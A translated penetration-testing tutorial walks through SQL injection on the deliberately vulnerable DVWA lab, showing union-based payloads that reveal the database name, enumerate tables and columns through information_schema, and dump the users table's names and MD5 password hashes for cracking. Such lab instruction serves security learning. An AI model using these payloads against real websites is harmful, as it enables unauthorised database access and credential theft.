In the previous article, SQL Injection in Penetration Testing (1), I explained the principle of SQL injection, the types of SQL injection and some methods to prevent SQL injection. The following chapters will analyze SQL injection from examples.
First, let’s analyze the low-level SQL injection of the DVWA shooting range.
There is a user id that we need to fill in, so let’s fill in a 1 to see what happens.
Here, the user id 1 is queried. Remember the method of verifying SQL injection that we mentioned earlier. Add a single quote after 1 and then we will enter 1’ to try it.
It can be seen that we input 1′, which causes the SQL statement to not be parsed normally, and finally causes the program to report an error
Then we preliminarily judge that there is an injection point here, then we can check the source code for analysis.
You can see the SQL statement here, and then you can see that the code below does not perform any filtering on our id parameter. This meets our injection requirements. There is a controllable variable id and no filtering is done. The statement is taken Enter the database for query. Know that SQL exists here
Injection, then how do we use it.
The following uses MYSQL database as an example
First of all, a few functions we need to know before learning SQL injection
database(): The database used by the current website
version(): The current version of MYSQL
user(): current MYSQL user
When we do not know any conditions, we have to query as follows
select field name to be queried from library name. table name
Then according to the SQL statement we see, here we can use the joint query
1' union select 1,database()#
Here are a few things to pay attention to
1. We need single quotes to close after 1
2. Use union select to query the number of fields we need to query later to be the same as before. There are two fields, one is 1, and the other is database()
3. The last point to note is that at the end we have to comment out the following content with #, because in the MYSQL statement # is the meaning of comment
After entering, you can see the name of our current database.
After knowing a piece of data, we can query through the following statement
select field name to be queried from library name. table name where known condition field name = value of known condition
And because mysql version 5.0 or higher comes with its own database, the information_schema records all database names, table names, and column names under current mysql. The following is the name of storing each information
information_schema.schemata: a table that records database information
information_schema.tables: a table that records table name information
information_schema.columns: a table that records column name information
schema_name database name
table_name table name
column_name column name
table_schema database name
The’.’ is the meaning of the next level. Knowing this, we can construct a SQL statement
Above we already know that the database name is dvwa, so we can burst out the table name in dvwa
1’union select 1, table_name from information_schema.tables where table_schema=”dvwa”#
I have seen the users table, users generally store user information, so we will explode the column name information under the users table
1’union select 1,column_name from information_schema.columns where table_name=’users’#
Here you can see that some user and password fields are estimated to store users and user passwords, then let’s check the contents of these fields.
1’union select 1,concat(user,password) from users#
Here is the MD5 value of the account and password, and then we can decrypt the MD5 value to see the user password
This is generally the general step of SQL injection, of course, this is only a small part of SQL injection, and some advanced injection techniques will be written in subsequent articles.